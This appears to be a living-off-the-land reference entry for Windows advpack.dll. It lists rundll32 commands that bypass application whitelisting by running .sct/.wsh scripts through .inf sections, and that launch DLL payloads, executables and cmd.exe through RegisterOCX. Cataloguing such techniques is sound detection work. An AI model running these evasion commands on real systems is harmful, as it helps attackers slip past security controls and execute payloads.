Utility for installing software and drivers with rundll32.exe

Paths:

c:\windows\system32\advpack.dll
c:\windows\syswow64\advpack.dll

Detection:

AWL bypass

Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,

Execute

Launch a DLL payload by calling the RegisterOCX function.

rundll32.exe advpack.dll,RegisterOCX test.dll

Launch an executable by calling the RegisterOCX function.

rundll32.exe advpack.dll,RegisterOCX calc.exe

Launch command line by calling the RegisterOCX function.

rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"